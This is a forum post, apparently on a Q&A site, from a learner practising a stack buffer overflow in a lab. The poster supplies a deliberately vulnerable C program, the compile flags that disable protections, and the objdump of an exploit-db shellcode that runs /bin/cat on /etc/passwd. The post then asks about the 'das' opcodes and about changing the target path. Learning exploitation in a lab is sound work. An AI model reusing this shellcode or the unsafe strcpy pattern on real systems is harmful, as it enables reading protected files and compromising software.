It's pretty much my first time playing around with a buffer overflow exploit. I've written a simple C program that is vulnerable to buffer overflows:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void main()
{
char* filename = getenv("filename");
char buff[128];
strcpy(buff, filename);
}
I compiled it like this on my Ubuntu Server 10.04 (i386)
gcc vuln.c -o vuln -z execstack -fno-stack-protector
I tried to inject various types of shellcodes after finding out how many bytes are needed in filename to override the return address (So then I pass a NOP slide + a shellcode + address that leads to the NOP slide through the filename environment variable). Common variations of execve bin/sh resulted in a segmentation fault within their own code, for some reason, but one oddly specific shellcode really did work for me:
Taken from https://www.exploit-db.com/exploits/38116/ It calls upon execve to run /bin/cat on /etc/passwd
Disassembly of section .text:
08048060 <.text>:
8048060: eb 1f jmp 0x8048081
8048062: 5b pop %ebx
8048063: 31 c0 xor %eax,%eax
8048065: 88 43 0b mov %al,0xb(%ebx)
8048068: 88 43 18 mov %al,0x18(%ebx)
804806b: 89 5b 19 mov %ebx,0x19(%ebx)
804806e: 8d 4b 0c lea 0xc(%ebx),%ecx
8048071: 89 4b 1d mov %ecx,0x1d(%ebx)
8048074: 89 43 21 mov %eax,0x21(%ebx)
8048077: b0 0b mov $0xb,%al
8048079: 8d 4b 19 lea 0x19(%ebx),%ecx
804807c: 8d 53 21 lea 0x21(%ebx),%edx
804807f: cd 80 int $0x80
8048081: e8 dc ff ff ff call 0x8048062
8048086: 2f das
8048087: 2f das
8048088: 2f das
8048089: 2f das
804808a: 62 69 6e bound %ebp,0x6e(%ecx)
804808d: 2f das
804808e: 63 61 74 arpl %sp,0x74(%ecx)
8048091: 23 2f and (%edi),%ebp
8048093: 2f das
8048094: 65 74 63 gs je 0x80480fa
8048097: 2f das
8048098: 70 61 jo 0x80480fb
804809a: 73 73 jae 0x804810f
804809c: 77 64 ja 0x8048102
804809e: 23 41 4a and 0x4a(%ecx),%eax
80480a1: 49 dec %ecx
80480a2: 54 push %esp
80480a3: 48 dec %eax
80480a4: 41 inc %ecx
80480a5: 4a dec %edx
80480a6: 49 dec %ecx
80480a7: 54 push %esp
80480a8: 48 dec %eax
80480a9: 4b dec %ebx
80480aa: 50 push %eax
Now, what you see here is objdump output and not the actual original assembly which I couldn't find. It seems like the /bin/cat and the /etc/passwd strings come after all those "2F" opcodes. A quick read-up on this opcode lead me to
Adjusts the result of the subtraction of two packed BCD values to create a packed BCD result.
I have no idea what that means, though, or how this contributes to the shellcode. Can anyone try to explain it?
- Moreover, I wanted to adjust this shellcode just a bit, so it calls /bin/cat on a different file path other than /etc/passwd, such as /home/kfir/helloworld, but it'll be cut off at /home/kfir/ - which is the same length as /etc/passwd (11 characters)